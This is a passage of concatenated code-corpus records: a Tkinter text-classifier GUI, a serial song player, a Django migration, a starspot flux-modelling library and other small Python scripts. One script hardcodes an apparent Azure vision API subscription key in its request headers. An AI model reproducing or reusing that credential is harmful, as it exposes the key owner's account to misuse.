Response\", 1)\n is_model_trained()\n\n\n\ndef is_model_trained():\n if Status.is_app_waiting == False:\n if Status.classifier_type == 'stylometry':\n my_file = Path(\"stylometry_model\")\n if my_file.is_file() == False:\n button3.configure(state='disabled')\n button4.configure(state='disabled')\n else:\n button3.configure(state='enabled')\n button4.configure(state='enabled')\n elif Status.classifier_type == 'content':\n my_file = Path(\"wordgram_model\")\n if my_file.is_file() == False:\n button3.configure(state='disabled')\n button4.configure(state='disabled')\n else:\n button3.configure(state='enabled')\n button4.configure(state='enabled')\n elif Status.classifier_type == 'agglomerative':\n my_file = Path(\"agglomerative_model\")\n if my_file.is_file() == False:\n button3.configure(state='disabled')\n button4.configure(state='disabled')\n else:\n button3.configure(state='enabled')\n button4.configure(state='enabled')\n else:\n my_file = Path(\"clustering_model\")\n if my_file.is_file() == False:\n button3.configure(state='disabled')\n button4.configure(state='disabled')\n else:\n button3.configure(state='enabled')\n button4.configure(state='enabled')\n button2.configure(state='enabled')\n\ndef message_status(message,type):\n\n if type == 0:\n status.configure(foreground=\"red\")\n status_text.set(message)\n else:\n status.configure(foreground=\"green\")\n status_text.set(message)\n\n#EVENT HANDLER\n\ndef model_trainer_start():\n update_status()\n if Status.classifier_type == 'stylometry':\n SC_Data_To_CSV.runProgram()\n SC_Model_Trainer.runProgram()\n elif Status.classifier_type == 'content':\n WGC_Data_To_CSV.runProgram()\n WGC_Model_Trainer.runProgram()\n elif Status.classifier_type == 'merged':\n MC_Data_To_CSV.runProgram()\n MC_Model_Trainer.runProgram()\n elif Status.classifier_type == 'agglomerative':\n ACC_Data_To_CSV.runProgram()\n ACC_Model_Trainer.runProgram()\n else :\n CC_Data_To_CSV.runProgram()\n CC_Model_Trainer.runProgram()\n is_model_trained()\n Status.is_app_waiting = False\n button2.configure(state='enabled')\n button3.configure(state='enabled')\n button4.configure(state='enabled')\n\ndef model_trainer():\n button2.configure(state='disabled')\n button3.configure(state='disabled')\n button4.configure(state='disabled')\n Status.is_app_waiting = True\n t = Thread(target=model_trainer_start)\n t.start()\n\ndef form_sheet_start():\n update_status()\n if Status.classifier_type == 'stylometry':\n view = Helper_Method.popupmsg(SC_User_Input.runProgram(textarea.get(\"1.0\", tk.END)))\n elif Status.classifier_type == 'content':\n view = Helper_Method.popupmsg(WGC_User_Input.runProgram(textarea.get(\"1.0\", tk.END)))\n elif Status.classifier_type == 'merged':\n view = Helper_Method.popupmsg(MC_User_Input.runProgram(textarea.get(\"1.0\", tk.END)))\n elif Status.classifier_type == 'agglomerative':\n view = Helper_Method.popupmsg(ACC_User_Input.runProgram(textarea.get(\"1.0\", tk.END)))\n else :\n view = Helper_Method.popupmsg(CC_User_Input.runProgram(textarea.get(\"1.0\", tk.END)))\n Status.is_app_waiting = False\n\ndef form_sheet_all():\n Status.is_report_prediction = True\n Status.is_app_waiting = True\n t1 = Thread(target=form_sheet_start)\n t1.start()\n\ndef form_sheet():\n Status.is_app_waiting = True\n t1 = Thread(target=form_sheet_start)\n t1.start()\n\ndef update_status_combo(index, value, op):\n classifier_Type.selection_clear()\n if classifier_Type.current() == 1:\n ngram_type.configure(state='disabled')\n else:\n ngram_type.configure(state='readonly')\n update_status()\n is_model_trained()\n\n\ndef update_status():\n classifier_Type.selection_clear()\n if classifier_Type.current() == 0:\n Status.classifier_type = 'clustering'\n elif classifier_Type.current() == 1:\n Status.classifier_type = 'stylometry'\n elif classifier_Type.current() == 2:\n Status.classifier_type = 'content'\n elif classifier_Type.current() == 3:\n Status.classifier_type = 'agglomerative'\n elif classifier_Type.current() == 4:\n Status.classifier_type = 'merged'\n\n if ngram_type.current() == 0:\n Status.vector_analyser_type = \"word\"\n else :\n Status.vector_analyser_type = \"char\"\n\n if ngram_val.current() == 0:\n Status.vector_analyser_range = 2\n elif ngram_val.current() == 1:\n Status.vector_analyser_range = 1\n elif ngram_val.current() == 2:\n Status.vector_analyser_range = 3\n elif ngram_val.current() == 4:\n Status.vector_analyser_range = 4\n elif ngram_val.current() == 5:\n Status.vector_analyser_range = 5\n elif ngram_val.current() == 6:\n Status.vector_analyser_range = 6\n elif ngram_val.current() == 7:\n Status.vector_analyser_range = 7\n elif ngram_val.current() == 8:\n Status.vector_analyser_range = 8\n elif ngram_val.current() == 9:\n Status.vector_analyser_range = 9\n else :\n Status.vector_analyser_range = 10\n\n if select_kbest_range.current() == 0:\n kbest_threshhold = 1000\n elif select_kbest_range.current() == 1:\n kbest_threshhold = 500\n else:\n kbest_threshhold = 5000\n\n\n# root\nroot = tk.Tk()\nroot.title(\"Gender Identifier\")\nstyle = ThemedStyle(root)\nstyle.set_theme(\"arc\")\nHelper_Method.center_window(1010, 580,root)\n\n# sidebar\nsidebar = tk.Frame(root, width=350, bg='white', height=800, relief='sunken', borderwidth=2)\n\n# TYPES\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=2)\nttk.Label(sidebar,text=\"Classifier Type\", style=\"BW.TLabel\",width=22,background=\"white\",foreground=\"black\").pack(side=tk.TOP)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=2)\nclassifier_Type_Text = tk.StringVar()\nclassifier_Type = ttk.Combobox(sidebar,textvariable=classifier_Type_Text,width=22,height=45,state=\"readonly\", values=(\"KMean Cluster (Recommended)\", \"Stylometry Method\", \"Content Method\",\"Agglomerative Cluster\",\"Merged Classifier\"))\nclassifier_Type.pack(side=tk.TOP)\nclassifier_Type.current(0)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=3)\n\nttk.Label(sidebar,text=\"N-Gram Type\", style=\"BW.TLabel\",width=22,background=\"white\",foreground=\"black\").pack(side=tk.TOP)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=2)\nngram_type_text = tk.StringVar()\nngram_type = ttk.Combobox(sidebar,textvariable=ngram_type_text,width=22,height=15,state=\"readonly\", values=(\"Word (Recomended)\", \"Char\"))\nngram_type.pack(side=tk.TOP)\nngram_type.current(0)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=3)\n\nttk.Label(sidebar,text=\"N-Gram Range\", style=\"BW.TLabel\",width=22,background=\"white\",foreground=\"black\").pack(side=tk.TOP)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=2)\nngram_val_text = tk.StringVar()\nngram_val = ttk.Combobox(sidebar,textvariable=ngram_val_text,width=22,height=15,state=\"readonly\", values=(\"1-2 (Recomended)\", \"1-1\", \"1-3\", \"1-4\", \"1-5\", \"1-6\", \"1-7\", \"1-8\", \"1-9\", \"1-10\"))\nngram_val.pack(side=tk.TOP)\nngram_val.current(0)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=3)\n\nttk.Label(sidebar,text=\"KBest Threshhold\", style=\"BW.TLabel\",width=20,background=\"white\",foreground=\"black\").pack(side=tk.TOP)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=2)\nselect_kbest_range_text = tk.StringVar()\nselect_kbest_range = ttk.Combobox(sidebar,textvariable=select_kbest_range_text,width=22,height=15,state=\"readonly\", values=(\"1000 (Recomended)\", \"500\", \"5000\"))\nselect_kbest_range.pack(side=tk.TOP)\nselect_kbest_range.current(0)\n\n# ACTIONS\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=33)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=33)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=20)\nstatus_text = tk.StringVar()\nstatus_text.set('Waiting For Response')\nstatus = ttk.Label(sidebar,textvariable=status_text, style=\"BW.TLabel\",width=22,background=\"white\",foreground=\"green\")\nstatus.pack(side=tk.TOP)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=15)\nbutton4 = ttk.Button(sidebar,width=22,text=\"Report Prediction\",command=form_sheet)\nbutton2 = ttk.Button(sidebar,width=22,text=\"Re-Train Model\",command=model_trainer)\nbutton3 = ttk.Button(sidebar,width=22,text=\"Make Prediction\",command=form_sheet_all)\nbutton2.pack(side=tk.TOP, pady=4, padx=10)\nbutton3.pack(side=tk.TOP, pady=4, padx=10)\nbutton4.pack(side=tk.TOP, pady=4, padx=10)\nsidebar.pack(expand=False, fill='both', side='left', anchor='nw')\n\n# combo changing events\nclassifier_Type_Text.trace('w',update_status_combo)\nngram_type_text.trace('w',update_status_combo)\nngram_val_text.trace('w',update_status_combo)\nselect_kbest_range_text.trace('w',update_status_combo)\n\n# main content area\nmainarea = tk.Frame(root, bg='#CCC', width=700, height=800)\ntextarea = tk.Text(mainarea,height=72,width=120)\ntextarea.pack(side=tk.RIGHT)\ntextarea.insert(tk.END, \"Write your Code\")\nmainarea.pack(expand=True, fill='both', side='right')\nis_model_trained()\n\nt = Thread(target=global_timer)\nt.start()\n\nroot.mainloop()\n","sub_path":"Plugin Projects/Matsbot/Classifier/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"179154551","text":"import serial\nimport time\n\nser = serial.Serial(\"COM3\")\n\nf = open('./songs.csv', 'r')\n\nsongs = []\nsongs_menu = {}\nwhile True:\n line = f.readline()\n if line == '':\n break\n line_data = line.strip().split(',')\n songs.append(line_data)\n songs_menu[line_data[0]] = line_data[1:]\n\n\nprint('Which song do you like? Enter the number:')\nfor i in range(len(songs)):\n print('{}. {}'.format(i + 1, songs[i][0]))\noption = int(input('>> '))\nsong = songs_menu[songs[option - 1][0]]\n\ntime.sleep(2)\nfor i in song:\n ser.write((i+'$').encode())\n print(i)\n time.sleep(0.5)\n","sub_path":"qiuhuiming/code/week8/sing.py","file_name":"sing.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"180874959","text":"import requests\nimport json\nurl=\"https://westus.api.cognitive.microsoft.com/vision/v1.0/describe?maxCandidates=1\"\nheaders = {\n # Request headers\n 'Content-Type': 'application/json',\n 'Ocp-Apim-Subscription-Key': '1e8134bdc68e401bb07f143de8e9c1e0',\n}\nparameters={\n 'maxCandidates':'1'\n}\nbod={\n \"url\":\"http://www.planwallpaper.com/static/images/desktop-year-of-the-tiger-images-wallpaper.jpg\"\n }\n\n\nresponse=requests.post(url,\"{'url':'http://www.wallpapereast.com/static/images/spring-in-nature-wide-wallpaper-603794.jpg'}\",headers=headers)\n#response=requests.post(url,data=bod,headers=headers)\n\ndata=response.json()\nresult=data['description']['captions'][0]['text']\n\n\n\n#print(data)\nprint(result)\n\n\n\n\nfrom gtts import gTTS\nimport os\n\ntts = gTTS(text=result, lang='en')\ntts.save(\"good.mp3\")\nos.system(\" good.mp3\")","sub_path":"Untitled-1.py","file_name":"Untitled-1.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"349946876","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('clientes', '0001_initial'),\n ('productos', '0002_auto_20141112_0418'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='AbonoCliente',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('abono', models.DecimalField(max_digits=8, decimal_places=2)),\n ('fecha', models.DateField(auto_now_add=True)),\n ('ap', models.IntegerField()),\n ('cliente', models.ForeignKey(to='clientes.Cliente')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Apartado',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('no_apartado', models.IntegerField()),\n ('fecha', models.DateField(auto_now_add=True)),\n ('cantidad', models.PositiveIntegerField()),\n ('precio', models.DecimalField(max_digits=8, decimal_places=2, blank=True)),\n ('fecha_vence', models.DateField(default=datetime.datetime(2014, 11, 27, 16, 22, 4, 132580))),\n ('estatus', models.CharField(default=b'A', max_length=1, choices=[(b'A', b'Activo'), (b'X', b'Anulado'), (b'C', b'Completado')])),\n ('cliente', models.ForeignKey(to='clientes.Cliente')),\n ('producto', models.ForeignKey(to='productos.Producto')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='DeudaCliente',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('deuda', models.DecimalField(max_digits=8, decimal_places=2)),\n ('cliente', models.ForeignKey(to='clientes.Cliente')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"apartados/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"578955726","text":"# Licensed under the MIT License - see LICENSE.rst\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\nimport os\nimport numpy as np\nfrom scipy.integrate import quad\nimport astropy.units as u\nfrom astropy.coordinates import UnitSphericalRepresentation, CartesianRepresentation\nfrom astropy.coordinates.matrix_utilities import rotation_matrix, matrix_product\n\nfrom .sun import draw_random_sunspot_latitudes, draw_random_sunspot_radii\n\n__all__ = ['Star', 'Spot']\n\ntrappist1_posteriors_path = os.path.join(os.path.dirname(__file__), os.pardir,\n 'data', 'trappist1',\n 'posteriors_bright_spot.txt')\n #'trappist1_spotmodel_posteriors.txt')\n #'trappist1_spotmodel_posteriors_onehemisphere.txt')\n#'trappist1_spotmodel_posteriors.txt')\n\nk296_posteriors_path = os.path.join(os.path.dirname(__file__), os.pardir,\n 'data', 'k296',\n 'k296_spotmodel_posteriors.txt')\n\n#np.random.seed(42)\n\n\nclass Spot(object):\n \"\"\"\n Properties of a starspot.\n \"\"\"\n def __init__(self, x=None, y=None, z=None, r=None, stellar_radius=1,\n contrast=None):\n \"\"\"\n Parameters\n ----------\n x : float\n X position [stellar radii]\n y : float\n Y position [stellar radii]\n z : float\n Z position [stellar radii], default is ``z=sqrt(r_star^2 - x^2 - y^2)``.\n r : float\n Spot radius [stellar radii], default is ``r=1``.\n stellar_radius : float\n Radius of the star, in the same units as ``x,y,z,r``. Default is 1.\n \"\"\"\n if z is None:\n z = np.sqrt(stellar_radius**2 - x**2 - y**2)\n self.r = r\n self.cartesian = CartesianRepresentation(x=x, y=y, z=z)\n self.contrast = contrast\n\n @classmethod\n def from_latlon(cls, latitude, longitude, radius, contrast=None):\n \"\"\"\n Construct a spot from latitude, longitude coordinates\n\n Parameters\n ----------\n latitude : float\n Spot latitude [deg]\n longitude : float\n Spot longitude [deg]\n radius : float\n Spot radius [stellar radii]\n \"\"\"\n\n cartesian = latlon_to_cartesian(latitude, longitude)\n\n return cls(x=cartesian.x.value, y=cartesian.y.value,\n z=cartesian.z.value, r=radius, contrast=contrast)\n\n @classmethod\n def from_sunspot_distribution(cls, mean_latitude=15, radius_multiplier=1,\n contrast=0.7):\n \"\"\"\n Parameters\n ----------\n mean_latitude : float\n Define the mean absolute latitude of the two symmetric active\n latitudes, where ``mean_latitude > 0``.\n \"\"\"\n lat = draw_random_sunspot_latitudes(n=1, mean_latitude=mean_latitude)[0]\n lon = 2*np.pi * np.random.rand() * u.rad\n radius = draw_random_sunspot_radii(n=1)[0]\n\n cartesian = latlon_to_cartesian(lat, lon)\n\n return cls(x=cartesian.x.value, y=cartesian.y.value,\n z=cartesian.z.value, r=radius*radius_multiplier,\n contrast=contrast)\n\n def __repr__(self):\n return (\"\"\n .format(self.x, self.y, self.z, self.r))\n\n\ndef latlon_to_cartesian(latitude, longitude, stellar_inclination=90*u.deg):\n \"\"\"\n Convert coordinates in latitude/longitude for a star with a given\n stellar inclination into cartesian coordinates.\n\n The X-Y plane is the sky plane: x is aligned with the stellar equator, y is\n aligned with the stellar rotation axis.\n\n Parameters\n ----------\n latitude : float or `~astropy.units.Quantity`\n Spot latitude. Will assume unit=deg if none is specified.\n longitude : float or `~astropy.units.Quantity`\n Spot longitude. Will assume unit=deg if none is specified.\n stellar_inclination : float\n Stellar inclination angle, measured away from the line of sight,\n in [deg]. Default is 90 deg.\n\n Returns\n -------\n cartesian : `~astropy.coordinates.CartesianRepresentation`\n Cartesian representation in the frame described above.\n \"\"\"\n\n if not hasattr(longitude, 'unit') and not hasattr(latitude, 'unit'):\n longitude *= u.deg\n latitude *= u.deg\n\n c = UnitSphericalRepresentation(longitude, latitude)\n cartesian = c.to_cartesian()\n\n rotate_about_z = rotation_matrix(90*u.deg, axis='z')\n rotate_is = rotation_matrix(stellar_inclination, axis='y')\n transform_matrix = matrix_product(rotate_about_z, rotate_is)\n cartesian = cartesian.transform(transform_matrix)\n return cartesian\n\n\nclass Star(object):\n \"\"\"\n Object defining a star.\n \"\"\"\n def __init__(self, spots=None, u1=0.4987, u2=0.1772, r=1,\n radius_threshold=0.1, rotation_period=25*u.day):\n \"\"\"\n The star is assumed to have stellar inclination 90 deg (equator-on).\n\n Parameters\n ----------\n u1 : float (optional)\n Quadratic limb-darkening parameter, linear term\n u2 : float (optional)\n Quadratic limb-darkening parameter, quadratic term\n r : float (optional)\n Stellar radius (default is unity)\n radius_threshold : float (optional)\n If all spots are smaller than this radius, use the analytic solution\n to compute the stellar centroid, otherwise use the numerical\n solution.\n spots : list (optional)\n List of spots on this star.\n rotation_period : `~astropy.units.Quantity`\n Stellar rotation period [default = 25 d].\n contrast : float (optional)\n Spot contrast relative to photosphere. Default is ``c=0.7``\n \"\"\"\n if spots is None:\n spots = []\n self.spots = spots\n\n self.spots_cartesian = CartesianRepresentation(x=[spot.cartesian.x for spot in spots],\n y=[spot.cartesian.y for spot in spots],\n z=[spot.cartesian.z for spot in spots])\n self.spots_r = np.array([spot.r for spot in spots])\n self.spot_contrasts = np.array([spot.contrast for spot in spots])\n self.x = 0\n self.y = 0\n self.r = r\n self.u1 = u1\n self.u2 = u2\n self.radius_threshold = radius_threshold\n self.rotations_applied = 0 * u.deg\n self.rotation_period = rotation_period\n self.inclination = 90*u.deg\n self.unspotted_flux = (2 * np.pi *\n quad(lambda r: r * self.limb_darkening_normed(r),\n 0, self.r)[0])\n\n def plot(self, n=3000, ax=None):\n \"\"\"\n Plot a 2D projected schematic of the star and its spots.\n\n Parameters\n ----------\n ax : `~matplotlib.pyplot.Axes`\n Axis object to draw the plot on\n n : int\n Number of pixels per side in the image.\n\n Returns\n -------\n ax : `~matplotlib.pyplot.Axes`\n Matplotlib axis object, with the new plot on it.\n \"\"\"\n import matplotlib.pyplot as plt\n\n if ax is None:\n ax = plt.gca()\n\n image = self._compute_image(n=n)\n\n ax.imshow(image, origin='lower', interpolation='nearest',\n cmap=plt.cm.Greys_r, extent=[-1, 1, -1, 1],\n vmin=0, vmax=1)\n ax.set_aspect('equal')\n\n ax.set_xlim([-1, 1])\n ax.set_ylim([-1, 1])\n ax.set_xlabel('x [$R_\\star$]', fontsize=14)\n ax.set_ylabel('y [$R_\\star$]', fontsize=14)\n return ax\n\n @classmethod\n def with_trappist1_spot_distribution(cls):\n samples = np.loadtxt(trappist1_posteriors_path)\n sample_index = np.random.randint(0, samples.shape[0])\n\n lat0, lon0, rad0, lat1, lon1, rad1, lat2, lon2, rad2, contrast, kep_offset = samples[sample_index, :]\n\n spots = [Spot.from_latlon(lat0, lon0, rad0, contrast),\n Spot.from_latlon(lat1, lon1, rad1, contrast),\n Spot.from_latlon(lat2, lon2, rad2, contrast)]\n\n return cls(spots=spots, rotation_period=3.3*u.day)\n\n @classmethod\n def with_k296_spot_distribution(cls):\n samples = np.loadtxt(k296_posteriors_path)\n sample_index = np.random.randint(0, samples.shape[0])\n\n lat0, lon0, rad0, lat1, lon1, rad1, contrast, kep_offset = samples[sample_index, :]\n\n spots = [Spot.from_latlon(lat0, lon0, rad0, contrast),\n Spot.from_latlon(lat1, lon1, rad1, contrast)]\n\n return cls(spots=spots, rotation_period=36.085629155859351*u.day)\n\n def spotted_area(self, times, t0=0):\n \"\"\"\n Compute flux at ``times`` as the star rotates.\n\n Parameters\n ----------\n times: `~numpy.ndarray`\n Times\n t0 : float\n Reference epoch.\n\n Returns\n -------\n area : `~numpy.ndarray`\n Area covered by spots at ``times`` [Hem]\n \"\"\"\n p_rot_d = self.rotation_period.to(u.d).value\n rotational_phases = (((times - t0) % p_rot_d) / p_rot_d) * 2*np.pi*u.rad\n\n # Rotate the star about its axis assuming stellar inclination 90 deg\n transform_matrix = rotation_matrix(rotational_phases[:, np.newaxis],\n axis='y')\n old_cartesian = self.spots_cartesian\n new_cartesian = old_cartesian.transform(transform_matrix)\n\n # Use numpy array broadcasting to vectorize computations with spot radii\n broadcast_radii = (np.ones_like(rotational_phases.value)[:, np.newaxis]\n * self.spots_r)\n\n # Only include spot flux if it's on the observer facing side\n visible = (new_cartesian.z > 0).astype(int)\n\n # Compute radial position of spot\n r_spots = np.sqrt(new_cartesian.x**2 + new_cartesian.y**2)\n\n # Compute approximate spot area, given foreshortening in 3D\n spot_areas = (np.pi * broadcast_radii**2 *\n np.sqrt(1 - (r_spots/self.r)**2))\n area = np.sum(spot_areas * visible, axis=1) / (2 * np.pi * self.r**2)\n if hasattr(area, 'unit'):\n area = area.value\n return area\n\n def flux(self, times, t0=0):\n \"\"\"\n Compute flux at ``times`` as the star rotates.\n\n Parameters\n ----------\n times: `~numpy.ndarray`\n Times\n t0 : float\n Reference epoch.\n\n Returns\n -------\n flux : `~numpy.ndarray`\n Fluxes at ``times``\n \"\"\"\n p_rot_d = self.rotation_period.to(u.d).value\n rotational_phases = (((times - t0) % p_rot_d) / p_rot_d) * 2*np.pi*u.rad\n\n # Rotate the star about its axis assuming stellar inclination 90 deg\n transform_matrix = rotation_matrix(rotational_phases[:, np.newaxis],\n axis='y')\n old_cartesian = self.spots_cartesian\n new_cartesian = old_cartesian.transform(transform_matrix)\n\n # Use numpy array broadcasting to vectorize computations with spot radii\n broadcast_radii = (np.ones_like(rotational_phases.value)[:, np.newaxis]\n * self.spots_r)\n\n # Only include spot flux if it's on the observer facing side\n visible = (new_cartesian.z > 0).astype(int)\n\n # Compute radial position of spot\n r_spots = np.sqrt(new_cartesian.x**2 + new_cartesian.y**2)\n\n # Compute approximate spot area, given foreshortening in 3D\n spot_areas = (np.pi * broadcast_radii**2 *\n np.sqrt(1 - (r_spots/self.r)**2))\n\n # For a given spot contrast and limb darkening, compute missing flux\n spot_flux = (-1 * spot_areas * self.limb_darkening_normed(r_spots) *\n (1 - self.spot_contrasts)) * visible\n\n return self.unspotted_flux + np.sum(spot_flux, axis=1)\n\n def fractional_flux(self, times, t0=0):\n \"\"\"\n Compute stellar flux as a fraction of the unspotted stellar flux at\n ``times`` as the star rotates.\n\n Parameters\n ----------\n times: `~numpy.ndarray`\n Times\n t0 : float\n Reference epoch.\n\n Returns\n -------\n flux : `~numpy.ndarray`\n Fluxes at ``times``\n \"\"\"\n return self.flux(times, t0=t0)/self.unspotted_flux\n #\n # def flux_weighted_area(self, times, t0=0):\n # \"\"\"\n # Compute flux at ``times`` as the star rotates.\n #\n # Parameters\n # ----------\n # times: `~numpy.ndarray`\n # Times\n # t0 : float\n # Reference epoch.\n #\n # Returns\n # -------\n # flux : `~numpy.ndarray`\n # Fluxes at ``times``\n # \"\"\"\n # p_rot_d = self.rotation_period.to(u.d).value\n # rotational_phases = (((times - t0) % p_rot_d) / p_rot_d) * 2*np.pi*u.rad\n #\n # # Rotate the star about its axis assuming stellar inclination 90 deg\n # transform_matrix = rotation_matrix(rotational_phases[:, np.newaxis],\n # axis='y')\n # old_cartesian = self.spots_cartesian\n # new_cartesian = old_cartesian.transform(transform_matrix)\n #\n # # Use numpy array broadcasting to vectorize computations with spot radii\n # broadcast_radii = (np.ones_like(rotational_phases.value)[:, np.newaxis]\n # * self.spots_r)\n #\n # # Only include spot flux if it's on the observer facing side\n # visible = (new_cartesian.z > 0).astype(int)\n #\n # # Compute radial position of spot\n # r_spots = np.sqrt(new_cartesian.x**2 + new_cartesian.y**2)\n #\n # # Compute approximate spot area, given foreshortening in 3D\n # spot_areas = (np.pi * broadcast_radii**2 *\n # np.sqrt(1 - (r_spots/self.r)**2))\n #\n # area_spotted = np.sum(spot_areas * visible, axis=1) / (2 * np.pi * self.r**2)\n #\n # if hasattr(area_spotted, 'unit'):\n # area_spotted = area_spotted.value\n #\n # # For a given spot contrast and limb darkening, compute missing flux\n # flux_spots = np.sum((spot_areas * self.limb_darkening_normed(r_spots) *\n # (1 - self.contrast)) * visible, axis=1)\n #\n # missing_photosphere = (-1 * spot_areas *\n # self.limb_darkening_normed(r_spots)) * visible\n #\n # flux_photosphere = self.unspotted_flux + np.sum(missing_photosphere,\n # axis=1)\n #\n # photosphere_area = 1 - area_spotted\n #\n # # flux_weighted_spot_area = (flux_photosphere * photosphere_area +\n # # flux_spots * area_spotted)\n #\n # flux_weighted_spot_area = (flux_spots * area_spotted /\n # (flux_photosphere * photosphere_area))\n #\n # if hasattr(flux_weighted_spot_area, 'unit'):\n # flux_weighted_spot_area = flux_weighted_spot_area.value\n #\n # return flux_weighted_spot_area\n\n def _compute_image(self, n=3000, delete_arrays_after_use=True):\n \"\"\"\n Compute the stellar centroid using a numerical approximation.\n\n Parameters\n ----------\n n : int\n Generate a simulated image of the star with ``n`` by ``n`` pixels.\n\n Returns\n -------\n x_centroid : float\n Photocenter in the x dimension, in units of stellar radii\n y_centroid : float\n Photocenter in the y dimension, in units of stellar radii\n \"\"\"\n image = np.zeros((n, n))\n x = np.linspace(-self.r, self.r, n)\n y = np.linspace(-self.r, self.r, n)\n x, y = np.meshgrid(x, y)\n\n # Limb darkening\n irradiance = self.limb_darkening_normed(np.sqrt(x**2 + y**2))\n\n on_star = x**2 + y**2 <= self.r**2\n\n image[on_star] = irradiance[on_star]\n on_spot = None\n\n for cartesian, r, c in zip(self.spots_cartesian, self.spots_r,\n self.spot_contrasts):\n if cartesian.z > 0:\n r_spot = np.sqrt(cartesian.x**2 + cartesian.y**2)\n foreshorten_semiminor_axis = np.sqrt(1 - (r_spot/self.r)**2)\n\n a = r # Semi-major axis\n b = r * foreshorten_semiminor_axis # Semi-minor axis\n A = np.pi/2 + np.arctan2(cartesian.y.value, cartesian.x.value) # Semi-major axis rotation\n on_spot = (((x - cartesian.x) * np.cos(A) +\n (y - cartesian.y) * np.sin(A))**2 / a**2 +\n ((x - cartesian.x) * np.sin(A) -\n (y - cartesian.y) * np.cos(A))**2 / b**2 <= self.r**2)\n\n image[on_spot & on_star] *= c\n\n if delete_arrays_after_use:\n del on_star\n if on_spot is not None:\n del on_spot\n del x\n del y\n del irradiance\n\n return image\n\n def limb_darkening(self, r):\n \"\"\"\n Compute the intensity at radius ``r`` for quadratic limb-darkening law\n with parameters ``Star.u1, Star.u2``.\n\n Parameters\n ----------\n r : float or `~numpy.ndarray`\n Stellar surface position in radial coords on (0, 1)\n\n Returns\n -------\n intensity : float\n Intensity in un-normalized units\n \"\"\"\n mu = np.sqrt(1 - r**2)\n u1 = self.u1\n u2 = self.u2\n return (1 - u1 * (1 - mu) - u2 * (1 - mu)**2) / (1 - u1/3 - u2/6) / np.pi\n\n def limb_darkening_normed(self, r):\n \"\"\"\n Compute the normalized intensity at radius ``r`` for quadratic\n limb-darkening law with parameters ``Star.u1, Star.u2``.\n\n Parameters\n ----------\n r : float or `~numpy.ndarray`\n Stellar surface position in radial coords on (0, 1)\n\n Returns\n -------\n intensity : float\n Intensity relative to the intensity at the center of the disk.\n \"\"\"\n return self.limb_darkening(r) / self.limb_darkening(0)\n\n def rotate(self, angle):\n \"\"\"\n Rotate the star, by moving the spots.\n\n Parameters\n ----------\n angle : `~astropy.units.Quantity`\n\n \"\"\"\n transform_matrix = rotation_matrix(angle, axis='y')\n\n old_cartesian = self.spots_cartesian\n new_cartesian = old_cartesian.transform(transform_matrix)\n self.spots_cartesian = new_cartesian\n self.rotations_applied += angle\n\n def derotate(self):\n self.rotate(-self.rotations_applied)\n self.rotations_applied = 0\n","sub_path":"libra/starspots/star.py","file_name":"star.py","file_ext":"py","file_size_in_byte":19023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"221769223","text":"\n\nnum = int(input())\t\t# Number of elemnts in an array\n\narr = []\t\t\t\t# Array of numbers\nte = input()\nte = te.split()\n\nfor i in range(num):\n\tarr.append(int(te[i]))\n\nfreq = [0 for i in range (128)]\t\t# Contains the number of times a particular Xor value comes (index represent the Xor value)\n\nfor i in range (num):\n\ttemp = [0 for k in range (128)]\n\n\tfor j in range (128):\n\t\tif j == arr[i]:\n\t\t\ttemp[j] = 1\n\t\telif freq[j] != 0:\n\t\t\ttemp [j^arr[i]] += freq[j]\n\tfor j in range (128):\n\t\tfreq[j] += temp[j]\n\nans = 0\n\nfor i in range(128):\n\tif freq[i]>1:\n\t\tans += freq[i]*(freq[i]-1)/2\n\nans = ans % 1000000007\nprint (int(ans))\n","sub_path":"panda.py","file_name":"panda.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"388301088","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2009 Benoit Chesneau \n#\n# This software is licensed as described in the file COPYING, which\n# you should have received as part of this distribution.\n\nimport os\nimport sys\n\nfrom ez_setup import use_setuptools\nif 'cygwin' in sys.platform.lower():\n min_version='0.6c6'\nelse:\n min_version='0.6a9'\ntry:\n use_setuptools(min_version=min_version)\nexcept TypeError:\n # If a non-local ez_setup is already imported, it won't be able to\n # use the min_version kwarg and will bail with TypeError\n use_setuptools()\n\nfrom setuptools import setup, 